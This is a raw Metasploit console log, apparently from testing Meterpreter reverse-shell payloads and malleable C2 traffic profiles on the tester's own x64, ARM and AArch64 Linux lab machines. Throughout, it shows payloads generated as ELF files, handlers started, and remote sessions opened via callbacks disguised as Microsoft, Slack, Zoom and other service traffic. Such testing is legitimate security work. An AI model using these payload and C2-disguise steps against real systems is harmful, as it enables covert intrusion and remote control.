[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 57chgtuo) Redirecting stageless: URI '/c/msdownload/update/others/2016/12/29136388_/RVpnZVJBM0ZsLU5wbDItVkE3NVlYQWo4TnJGMTd5UGN3Si0zQzZyY3FNYU1nM3lwQV9JeWk0YVcyTEd0Y2NLbW1XUG5CLWZpMnR5aEw2.cab' with UA '' -> UUID EZgeRA3Fl-Npl2-VA75YcAI_B_Fjwpp0K0iG5HSw-jZjYC4lk18E5Ti-bO-PA6OJhrO9H-zYu2BeG4jc7NQzYiXBDgfylYqFivskDikbZG
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 57chgtuo) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 57chgtuo) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 57chgtuo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:54840) at 2026-06-10 05:44:10 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         meterpreter x64/linux  kali @ kali  192.168.3.10:8080 -> 192.168.3.10:54840 (192.168.3.10)

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.3.10 - Meterpreter session 1 closed.  Reason: User exit
msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 
malleablec2 => /home/kali/Documents/profiles/microsoft_update.profile
msf payload(linux/x64/meterpreter_reverse_http) >

mscrl ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/mscrl.profile
malleablec2 => /home/kali/Documents/profiles/mscrl.profile
msf payload(linux/x64/meterpreter_reverse_http) > to_handler 
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0pt59gqo) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0pt59gqo) Redirecting stageless: URI '/pki/mscorp/cps/default.htm' with UA '' -> UUID 0wIWqqCMgOzvYulghUvdjAQhBLS4bpBZoWcdR3YWx7w9mNTGm
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0pt59gqo) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0pt59gqo) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 0pt59gqo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:52606) at 2026-06-10 05:48:32 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

msnbcvideo_getonly ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/msnbcvideo_getonly.profile
malleablec2 => /home/kali/Documents/profiles/msnbcvideo_getonly.profile
msf payload(linux/x64/meterpreter_reverse_http) > to_handler 
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080
set malleablec2 /home/kali/Documents/profiles/msnbInterrupt: use the 'exit' command to quit
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7hc3pofw) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7hc3pofw) Redirecting stageless: URI '/z/msnbc2_live01@9615/manifest.f4m' with UA '' -> UUID OUY7Od3hu7VyynTIGONEcg0ALNfQOEme4Xdd-gZMQJClcLF7txFg5s98GLEppb38A3rwi9daT1k96DR1IWJ1B5ulFa9Mf1POlYp-5FbLORkNzk
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7hc3pofw) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7hc3pofw) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7hc3pofw) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:37470) at 2026-06-10 06:04:42 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.3.10 - Meterpreter session 1 closed.  Reason: User exit
msf payload(linux/x64/meterpreter_reverse_http) >

office365_calendar ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/office365_calendar.profile
malleablec2 => /home/kali/Documents/profiles/office365_calendar.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: hxvf2erw) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: hxvf2erw) Redirecting stageless: URI '/owa/' with UA '' -> UUID 5hcpf-I7h7DYjd6PsqTvgA2BHMPWDleiQB4v3Wevl91gBQUEj5rvU8tD-Uq
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: hxvf2erw) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: hxvf2erw) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: hxvf2erw) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:46944) at 2026-06-10 06:06:07 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter >

oscp ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/oscp.profile
malleablec2 => /home/kali/Documents/profiles/oscp.profile
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: avly5pwt) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: avly5pwt) Redirecting stageless: URI '/oscp/Cfst7YYXxRXIIc4jogj_6QGOumfxF5GPrcTCJKox2i-c3wwBmb__92i2zuXII6q7ZF886nUoKOlOClexRa7ldUTjWDoshiBCani96FqgXWQ3F-w_5jcVEP40' with UA '' -> UUID Cfst7YYXxRXIIc4jogj_6g6Rx00zqW_UJ
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: avly5pwt) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: avly5pwt) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: avly5pwt) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:41562) at 2026-06-10 06:09:18 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

reddit ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/reddit.profile
malleablec2 => /home/kali/Documents/profiles/reddit.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 9v6mdx2z) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 9v6mdx2z) Redirecting stageless: URI '/r/webdev/comments/95ltyr' with UA '' -> UUID TFKfTpiuw30U8RLzftgsowW8FW-O4bnzTxUoWJqvbgn7KMpoe6GPeQvqwQTetw-2c5bak1lDjJzVjYqXDJbuywKMs5S
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 9v6mdx2z) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 9v6mdx2z) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 9v6mdx2z) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:38074) at 2026-06-10 06:11:32 -0400
 
msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.3.10 - Meterpreter session 1 closed.  Reason: User exit
msf payload(linux/x64/meterpreter_reverse_http) >

rtmp ✅

msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: lwr06yxf) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: lwr06yxf) Redirecting stageless: URI '/idle/1376547834/1' with UA '' -> UUID c8i4Jby9eYyrQK1CwWmTnAu8x6ZzzED___7emtzc6C9xlWk1GYdN3dOhEYKbNPz0olKl__u4KxcXqfrmi07DXCJkXsNUqmfbxxFmlCrbzhbF0qmVRlRG4g9T8
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: lwr06yxf) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: lwr06yxf) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: lwr06yxf) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:56036) at 2026-06-10 06:13:50 -0400
msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter >

slack 🔴

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/slack.profile
malleablec2 => /home/kali/Documents/profiles/slack.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: xphyd07m) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: xphyd07m) Redirecting stageless: URI '/messages/C0527B0NM' with UA '' -> UUID q3DrkDyE_23Ui9KJvqLtKA3SE2pfsnzusrbjiePuibddLbsTlcE4fCqhiGB6o4KyY-Afpxf87kyPJzk6XfGo_jujdswDbnfdJy31YohJqSdPaPBq_Oln
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: xphyd07m) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: xphyd07m) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: xphyd07m) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:41582) at 2026-06-10 06:17:09 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter >

stackoverflow ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/stackoverflow.profile
malleablec2 => /home/kali/Documents/profiles/stackoverflow.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7qsdle6j) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7qsdle6j) Redirecting stageless: URI '/questions/32251816/c-sharp-directives-compilation-error' with UA '' -> UUID 7ZPa6ERcH2yOWYhb5HC0FAHOqWRFHUS1myZrZIp2TzAwBlYPxPdY-YFDouTuMwC94j6H9GtSXtmFTYdvWOY1Rfa6G2vx
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7qsdle6j) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7qsdle6j) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 7qsdle6j) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:47318) at 2026-06-10 06:20:00 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter >

trevor ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/trevor.profile
malleablec2 => /home/kali/Documents/profiles/trevor.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: dxi96hvr) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: dxi96hvr) Redirecting stageless: URI '/us/ky/louisville/312-s-fourth-st.html' with UA '' -> UUID vHSrZBS5wSFnkmGQDbtdVA0HaWUXLc1VTZ-v340L_8ahMVmzEBuCcoKIO1q4zttjUXD
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: dxi96hvr) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: dxi96hvr) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: dxi96hvr) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:38000) at 2026-06-10 06:22:00 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.3.10 - Meterpreter session 1 closed.  Reason: User exit
msf payload(linux/x64/meterpreter_reverse_http) >

youtube_video ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/youtube_video.profile
malleablec2 => /home/kali/Documents/profiles/youtube_video.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 5eq7apdy) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 5eq7apdy) Redirecting stageless: URI '/watch' with UA '' -> UUID 7bqoonWCpgeSS5RJ-GKpfAkTjXgOFf4cCJnb2Qi3xU7CoOyhz4SAeZjiCOazlMFEP-6YSo1ZJcjfv489vEzb
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 5eq7apdy) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 5eq7apdy) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: 5eq7apdy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:38402) at 2026-06-10 06:23:53 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.3.10 - Meterpreter session 1 closed.  Reason: User exit
msf payload(linux/x64/meterpreter_reverse_http) >

zoom ✅

msf payload(linux/x64/meterpreter_reverse_http) > set malleablec2 /home/kali/Documents/profiles/zoom.profile
malleablec2 => /home/kali/Documents/profiles/zoom.profile
msf payload(linux/x64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.x64.elf
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/mettle/x86_64-linux-musl/bin/mettle is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 1138480 bytes to ~/Public/metsrv.x64.elf...
msf payload(linux/x64/meterpreter_reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/x64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: wr7oazx5) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: wr7oazx5) Redirecting stageless: URI '/s/58462514417 /wc/58462514417' with UA '' -> UUID koLWr7Y8hUDhdOd2i123UQcptWFO4fS4
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: wr7oazx5) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: wr7oazx5) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 192.168.3.10; (UUID: wr7oazx5) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 192.168.3.10:53114) at 2026-06-10 08:18:47 -0400

msf payload(linux/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: kali
meterpreter >

X86

reverse tcp (stageless ad staged)

reverse https (stageless)

test profiles

ARMLE

reverse tcp (stageless ad staged)

staged ✅

msf payload(linux/armle/meterpreter/reverse_tcp) > 
[*] Sending stage (988552 bytes) to 10.5.132.212
[*] Meterpreter session 1 opened (192.168.3.10:4444 -> 10.5.132.212:44788) at 2026-06-15 12:20:04 -0400

msf payload(linux/armle/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >

stageless ✅

msf payload(linux/armle/meterpreter_reverse_tcp) > [*] Meterpreter session 2 opened (192.168.3.10:4444 -> 10.5.132.212:55402) at 2026-06-15 12:31:55 -0400

msf payload(linux/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: kali
meterpreter >

reverse https (stageless) ✅

msf payload(linux/armle/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: w1iy0ux3) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: w1iy0ux3) Redirecting stageless: URI '/IsssaLEsUr8DMAU8aQApUwlXUS_' with UA '' -> UUID IsssaLEsUr8DMAU8aQApQQ8-mQOBvmgNVsZgrftNm8B8i
[!] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: w1iy0ux3) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: w1iy0ux3) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: w1iy0ux3) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (192.168.3.10:8080 -> 10.5.132.212:41130) at 2026-06-15 12:38:15 -0400

msf payload(linux/armle/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: kali
meterpreter >

profile test ✅

msf payload(linux/armle/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080
[!] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: i8qe5b2p) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: i8qe5b2p) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA '' -> UUID Sa_MOvbTQghKTkxCIH9VHw-o-1mLZ3o9R-l63ENglX_aUJ7RqdKsBVOg
[!] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: i8qe5b2p) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: i8qe5b2p) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8080 handling request from 10.5.132.212; (UUID: i8qe5b2p) Without a database connected that payload UUID tracking will not work!

msf payload(linux/armle/meterpreter_reverse_http) > sessions -[*] Meterpreter session 1 opened (192.168.3.10:8080 -> 10.5.132.212:57386) at 2026-06-16 06:03:02 -0400
i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: kali
meterpreter >

AARCH64

reverse tcp (stageless ad staged)

staged ✅

msf payload(linux/aarch64/meterpreter/reverse_tcp) > jobs -K
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (1002812 bytes) to 10.5.132.215
[*] Meterpreter session 13 opened (192.168.3.10:4444 -> 10.5.132.215:40122) at 2026-06-15 11:29:32 -0400

Stopping all jobs...
msf payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali
meterpreter >

stageless ✅

msf payload(linux/aarch64/meterpreter_reverse_tcp) > generate -f elf -o ~/Public/metsrv.aarch64.elf
[*] Writing 1198496 bytes to ~/Public/metsrv.aarch64.elf...
msf payload(linux/aarch64/meterpreter_reverse_tcp) > [*] Meterpreter session 14 opened (192.168.3.10:4444 -> 10.5.132.215:41612) at 2026-06-15 11:31:01 -0400

msf payload(linux/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 14...

meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali
meterpreter >

reverse https (stageless) ✅

msf payload(linux/aarch64/meterpreter_reverse_http) > unset MALLEABLEC2 
Unsetting MALLEABLEC2...
msf payload(linux/aarch64/meterpreter_reverse_http) > generate -f elf -o ~/Public/metsrv.aarch64.elf
[*] Writing 1198496 bytes to ~/Public/metsrv.aarch64.elf...
msf payload(linux/aarch64/meterpreter_reverse_http) > jobs -K
Stopping all jobs...
msf payload(linux/aarch64/meterpreter_reverse_http) > to_handler 
[*] Payload Handler Started as Job 22
msf payload(linux/aarch64/meterpreter_reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.3.10:8080

msf payload(linux/aarch64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8080 handling request from 10.5.132.215; (UUID: t6e579hx) Without a database connected that payload UUID tracking will not work!
